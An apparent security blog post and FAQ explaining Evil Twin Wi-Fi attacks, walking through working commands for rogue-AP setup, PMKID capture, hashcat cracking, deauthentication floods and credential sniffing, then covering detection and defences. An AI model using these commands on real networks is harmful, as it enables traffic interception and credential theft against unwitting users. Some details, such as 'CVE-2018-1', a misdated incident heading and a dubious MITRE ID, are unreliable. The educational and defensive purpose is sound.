What is an Evil Twin access point?

An Evil Twin is a rogue Wi-Fi access point that impersonates a legitimate one by broadcasting the same SSID (and optionally the same BSSID). When clients connect, the attacker acts as a man-in-the-middle, intercepting and potentially modifying all traffic flowing between the client and the real network.

Does Evil Twin require cracking WPA2 first?

No. A rogue open AP with a matching SSID can capture traffic from clients that auto-connect or that can be deauthenticated from the real AP. The attacker can also capture the 4-way WPA2 handshake or a PMKID hash and crack the PSK offline — then stand up a fully encrypted clone. Alternatively, a captive-portal Evil Twin requires no WPA2 crack at all.

What is the PMKID attack and how is it different from the 4-way handshake capture?

The PMKID attack (discovered by Jens Steube in 2018, CVE-2018-1) extracts a single hash value from the first EAPOL frame of an association request — without needing to observe a full client authentication. This means the attacker does not need to wait for a client to connect; they can query the AP directly. The resulting PMKID hash is then cracked offline with hashcat using mode 22000.

What is a KARMA attack?

KARMA exploits the fact that 802.11 clients in Active Scan mode broadcast Probe Request frames listing preferred SSIDs (networks they have connected to before). A KARMA-capable rogue AP responds to any Probe Request with a matching Probe Response, claiming to be the requested network. The client connects automatically, believing it found a trusted network.

Can WPA3 stop Evil Twin attacks?

WPA3 with Simultaneous Authentication of Equals (SAE) eliminates offline dictionary attacks against the handshake. WPA3 also introduces Protected Management Frames (PMF/802.11w) by default, which prevents deauthentication frame spoofing. However, Evil Twin attacks that rely on a captive portal or that target clients downgrading to WPA2 (transition mode) remain viable.

What is 802.11w and does it stop deauth attacks?

IEEE 802.11w (Protected Management Frames) adds MIC (Message Integrity Code) protection to unicast management frames including deauthentication and disassociation frames. When PMF is enforced, spoofed deauth frames are discarded by the client. However, broadcast deauth frames remain unprotected in many implementations, and most networks still operate in optional rather than required PMF mode.

How do enterprise wireless systems detect rogue APs?

Enterprise wireless intrusion detection systems (WIDS) — such as Cisco WLC Rogue Management, Meraki Air Marshal, or Aruba RAPDs — detect rogue APs through continuous off-channel scanning by access points acting as monitors. They flag SSIDs matching production SSIDs on unauthorized BSSIDs, unexpected channel usage, and clients probing for known SSIDs from unknown BSSIDs.

Man-in-the-Middle on Wi-Fi: What Evil Twin Access Points Actually Look Like

Wi-Fi security failures rarely look like the movies. There is no dramatic exploit, no custom shellcode. An attacker sits in a coffee shop, a hotel lobby, or an airport gate, spins up a software AP on a commodity laptop, and waits. The clients come to them. The traffic flows in plaintext — or, if encrypted, with keys they already hold.

Evil Twin attacks are not theoretical. The DEF CON Wall of Sheep has logged thousands of credential captures from attendees using open or improperly secured wireless networks at a single conference. Enterprise environments suffer targeted variants: attackers parked outside office buildings or inside co-working spaces, cloning corporate SSIDs to intercept VPN-less traffic or steal domain credentials.

This post covers the full technical attack chain — from rogue AP setup and PMKID capture to WPA2 offline cracking, deauthentication frame injection, and traffic interception — along with the detection mechanisms and defenses that actually work.

How Evil Twin Attacks Work: The Attack Chain

The Evil Twin attack exploits how 802.11 clients select and authenticate to access points. The protocol was designed for availability and convenience, not for authenticity. Clients trust SSIDs; they do not verify AP identity by default.

Step 1: Reconnaissance

Before standing up a rogue AP, the attacker identifies the target network’s SSID, BSSID (MAC address), operating channel, and security type.

1# Put adapter into monitor mode
2sudo airmon-ng start wlan0
3
4# Scan for nearby access points
5sudo airodump-ng wlan0mon
6
7# Target specific BSSID and channel
8sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon

airodump-ng output reveals: BSSID, channel, encryption type (WPA2, OPN), ESSID, and connected client MAC addresses. This gives the attacker everything needed to clone the AP.

Step 2: Stand Up the Evil Twin

The rogue AP is configured with hostapd, a user-space daemon that turns any Wi-Fi adapter supporting master mode into a software access point.

 1# /etc/hostapd/evil-twin.conf
 2interface=wlan1
 3driver=nl80211
 4ssid=CoffeeShop_Free_WiFi
 5hw_mode=g
 6channel=6
 7macaddr_acl=0
 8auth_algs=1
 9ignore_broadcast_ssid=0
10wpa=0

For a WPA2 clone (when the PSK is known or has been cracked):

 1interface=wlan1
 2driver=nl80211
 3ssid=CorporateSSID
 4hw_mode=g
 5channel=11
 6macaddr_acl=0
 7auth_algs=1
 8wpa=2
 9wpa_passphrase=CrackedPasswordHere
10wpa_key_mgmt=WPA-PSK
11rsn_pairwise=CCMP

 1sudo hostapd /etc/hostapd/evil-twin.conf &
 2
 3# Assign IP and start DHCP for clients
 4sudo ip addr add 192.168.99.1/24 dev wlan1
 5sudo dnsmasq --interface=wlan1 \
 6  --dhcp-range=192.168.99.10,192.168.99.100,12h \
 7  --no-resolv --server=8.8.8.8
 8
 9# Enable IP forwarding and NAT to upstream
10sudo sysctl -w net.ipv4.ip_forward=1
11sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

At this point the Evil Twin is operational. Clients that connect receive valid DHCP leases and internet access, which reduces suspicion.

Step 3: PMKID Capture (Clientless WPA2 Hash Extraction)

The traditional method required capturing a complete 4-way handshake, which means waiting for a client to authenticate. The PMKID technique, published by Jens Steube (hashcat author) in August 2018, changed this.

The PMKID is derived from:

PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AP_MAC || Client_MAC)

It appears in the EAPOL RSN Information Element of the first frame the AP sends during association. An attacker can request this frame directly from the AP without a connected client.

 1# Install hcxtools
 2sudo apt install hcxtools hcxdumptool
 3
 4# Capture PMKID from target AP (no client needed)
 5sudo hcxdumptool -i wlan0mon \
 6  --filterlist_ap=target_bssid.txt \
 7  --filtermode=2 \
 8  -o pmkid_capture.pcapng
 9
10# Convert capture to hashcat format (mode 22000)
11hcxpcapngtool -o hash.hc22000 pmkid_capture.pcapng

Step 4: Offline WPA2 Cracking with hashcat

 1# Crack WPA2 PMKID or handshake using hashcat mode 22000
 2hashcat -m 22000 hash.hc22000 /usr/share/wordlists/rockyou.txt
 3
 4# With rules for better coverage
 5hashcat -m 22000 hash.hc22000 /usr/share/wordlists/rockyou.txt \
 6  -r /usr/share/hashcat/rules/best64.rule
 7
 8# Mask attack for 8-digit numeric PINs (common for ISPs)
 9hashcat -m 22000 hash.hc22000 -a 3 ?d?d?d?d?d?d?d?d
10
11# Check cracked results
12hashcat -m 22000 hash.hc22000 --show

On a modern GPU (RTX 4090), WPA2 cracking runs at approximately 1.5–2 million hashes per second. A 10-character mixed-case alphanumeric PSK from rockyou.txt falls in minutes; a random 12-character PSK with full character set would require years of brute force — highlighting why PSK complexity matters.

Step 5: Deauthentication Frame Injection

Even if clients are already connected to the legitimate AP, an attacker can force them to reconnect by sending spoofed 802.11 deauthentication frames. These are unencrypted management frames in 802.11; without PMF (802.11w), any station can send them.

1# Send deauth frames to all clients of target AP (broadcast)
2sudo aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF wlan0mon
3
4# Target a specific client
5sudo aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon

A Scapy-based deauth flood for demonstration purposes:

 1#!/usr/bin/env python3
 2"""
 3Deauth frame flood — educational/research use only.
 4Requires monitor mode adapter and root privileges.
 5"""
 6from scapy.all import *
 7import time
 8
 9TARGET_AP   = "AA:BB:CC:DD:EE:FF"   # BSSID of legitimate AP
10TARGET_STA  = "FF:FF:FF:FF:FF:FF"   # FF:FF:FF:FF:FF:FF = broadcast (all clients)
11IFACE       = "wlan0mon"
12
13def build_deauth(ap_mac, sta_mac, reason=7):
14    dot11 = Dot11(addr1=sta_mac, addr2=ap_mac, addr3=ap_mac)
15    mgmt  = Dot11Deauth(reason=reason)
16    return RadioTap() / dot11 / mgmt
17
18packet = build_deauth(TARGET_AP, TARGET_STA)
19
20print(f"[*] Sending deauth frames to {TARGET_STA} from AP {TARGET_AP}")
21sendp(packet, iface=IFACE, count=50, inter=0.1, verbose=0)
22print("[*] Done.")

Reason code 7 is “Class 3 frame received from nonassociated STA,” a common reason code used in legitimate deauthentication — blending into normal traffic.

Step 6: Traffic Interception and Credential Harvesting

With clients connected to the Evil Twin, the attacker runs a proxy or packet capture:

 1# Capture all traffic on the rogue interface
 2sudo tcpdump -i wlan1 -w victim_traffic.pcap
 3
 4# Wireshark display filter: look for credentials in HTTP POST bodies
 5http.request.method == "POST" && http contains "password"
 6
 7# Filter for DNS queries (reveals visited sites)
 8dns
 9
10# Filter for FTP clear-text login
11ftp.request.command == "PASS"
12
13# Capture HTTP Authorization headers (Basic auth)
14http.authorization

The KARMA Attack

KARMA exploits the Active Scanning behavior of 802.11 clients. When a device is searching for known networks, it broadcasts Probe Requests containing the SSIDs of networks it has previously connected to.

Client → [broadcast] Probe Request: "HomeNetwork"
Client → [broadcast] Probe Request: "Marriott_Guest"
Client → [broadcast] Probe Request: "Delta_WiFi"

A KARMA-capable rogue AP (supported by tools like hostapd-wpe, WiFi-Pumpkin, or airbase-ng) responds to every Probe Request with a matching Probe Response:

Rogue AP → Client: Probe Response: "HomeNetwork" (I am your home network)
Client → Rogue AP: [associates and authenticates]

1# airbase-ng with KARMA (-P flag responds to all probe requests)
2sudo airbase-ng -P -C 30 -e "FrequentFlyerWifi" wlan0mon

Modern operating systems (iOS 14+, Android 10+, Windows 10 1903+) have partially mitigated KARMA by randomizing MAC addresses and suppressing Probe Request SSIDs for networks not recently seen. However, enterprise devices with MDM-pinned network profiles and older IoT devices remain vulnerable.

Real-World Incidents

DEF CON Wall of Sheep (Annual, Las Vegas) The DEF CON Wall of Sheep project passively monitors conference Wi-Fi for credentials transmitted in cleartext or over improperly validated SSL. In a single DEF CON conference, the team has publicly displayed thousands of captured credential pairs — usernames and passwords from email clients, web forms, and poorly implemented apps — collected from convention attendees who connected to networks without VPN.

Airport and Hotel Evil Twin Campaigns (2022–2023) The Australian Federal Police charged a man in May 2024 with operating Evil Twin hotspots on domestic flights and in airports. The attacker allegedly collected credentials from passengers who connected to SSIDs like “Free Airport Wi-Fi” and entered login details into a captive portal harvester. This is a textbook KARMA + captive portal Evil Twin — no WPA2 cracking required.

Enterprise Evil Twin — Financial Sector (2021) Threat intelligence reports from Bishop Fox and others have documented red team engagements in which testers parked outside a financial services firm, cloned the corporate SSID visible from the parking lot, and captured domain credentials from laptops that auto-connected using cached profiles. Without 802.1X and certificate validation, the laptops had no way to distinguish the real AP from the rogue.

Detection

Wireless Intrusion Detection System (WIDS) Alerts

Enterprise WIDS platforms perform continuous off-channel scanning and flag:

Rogue SSID on unauthorized BSSID: SSID matches production network but MAC is not in the authorized AP list.
Signal strength anomaly: Rogue AP with higher RSSI than the authorized AP on the same BSSID.
Deauthentication storm: Elevated management frame rate targeting a specific AP or channel.
PMKID request anomaly: Unusual association request patterns from unknown clients.

Cisco WLC (Wireless LAN Controller) rogue detection:

(WLC) > show rogue ap summary
(WLC) > show rogue client summary
(WLC) > config rogue ap classify malicious ssid CorporateSSID

Meraki Air Marshal provides automatic classification of rogue APs in the Security > Air Marshal dashboard, with alerting via webhook or email.

Log Sources and IOCs

Source	What to Look For
WIDS alerts	Rogue AP detected on known SSID
WLC syslog	`%CAPWAP-3-ROGUE_AP_CLASSIFIED`
Client event logs	802.1X EAP failure (certificate mismatch)
DNS logs	Clients querying from unexpected subnet
SIEM	Multiple clients roaming from known AP to unknown BSSID

CLI Commands for Investigation

 1# Linux client: check current BSSID and signal
 2iwconfig wlan0
 3iw wlan0 link
 4
 5# Show all visible APs and their BSSIDs on a channel
 6iw wlan0 scan | grep -E "SSID|BSS|signal|freq"
 7
 8# Check if AP BSSID has changed (compare against known good)
 9iw wlan0 link | grep Connected
10
11# Windows: list visible SSIDs and BSSIDs
12netsh wlan show networks mode=bssid

Certificate validation failure on 802.1X networks is a strong indicator. When a client connects to an Evil Twin RADIUS proxy that presents a self-signed or mismatched certificate, the supplicant will log:

Event ID 6272 / 6273 (Windows Security log): NPS rejected authentication
EAP failure reason: Certificate validation failed

Defense and Mitigation

1. Deploy 802.1X / WPA3-Enterprise

WPA2-Personal (PSK) is fundamentally vulnerable — any client with the PSK can impersonate an AP for other clients. 802.1X with EAP-TLS authenticates both the client and the RADIUS server using certificates. When properly configured:

The client validates the server certificate before sending credentials.
A rogue AP cannot present a valid certificate for your RADIUS server.
Capture of the 4-way handshake yields nothing — per-session keys derived from the PMK make offline cracking impossible.

1<!-- Windows supplicant policy (Group Policy / Intune) -->
2<!-- Enforce server certificate validation -->
3<EapType>
4  <ServerValidation>
5    <DisableUserPromptForServerValidation>true</DisableUserPromptForServerValidation>
6    <TrustedRootCA>SHA1_THUMBPRINT_OF_INTERNAL_CA</TrustedRootCA>
7  </ServerValidation>
8</EapType>

2. Enforce Protected Management Frames (802.11w)

# Cisco WLC — require PMF for SSID
(WLC) > config wlan security pmf required <wlan-id>

# Verify
(WLC) > show wlan <wlan-id> | include PMF

3. Mandate VPN on All Untrusted Wi-Fi

Even a perfect Evil Twin intercept yields only encrypted TLS traffic if clients enforce a VPN. Zero-trust network access (ZTNA) solutions that establish tunnels before any application traffic traverses the network are the most resilient control.

4. Deploy and Monitor WIDS

Cisco WLC: Enable rogue detection, configure authorized AP list, set rogue rule for “malicious” classification on SSID match.
Meraki Air Marshal: Enable automatic containment with caution (may disrupt neighbor networks); configure alerts for rogue APs matching production SSIDs.
Ekahau / NetScout: Site survey tools can be used to baseline known APs and flag changes.

5. Client-Side Certificate Pinning

For mobile applications that transmit sensitive data over Wi-Fi, TLS certificate pinning prevents a MitM proxy on the Evil Twin from intercepting traffic even with a trusted CA cert.

6. Disable Auto-Connect to Open Networks

1# Windows: prevent auto-connect to open networks via Intune/GPO
2Set-NetConnectionProfile -NetworkCategory Public
3netsh wlan set profileparameter name="OldOpenProfile" connectionmode=manual

7. Network Segmentation and DNS Monitoring

Place guest and BYOD devices on isolated VLANs. Monitor DNS resolution from Wi-Fi clients for unexpected resolvers or high-entropy domains (indicators of KARMA-based C2).

MITRE ATT&CK Mapping

Technique	ID	Description
Adversary-in-the-Middle: Wi-Fi	T1557.002	Evil Twin AP for traffic interception
Network Sniffing	T1040	Passive credential capture on rogue AP
Brute Force: Password Cracking	T1110.002	Offline WPA2/PMKID hash cracking
Deauthentication Attack	T1563 (sub)	802.11 management frame injection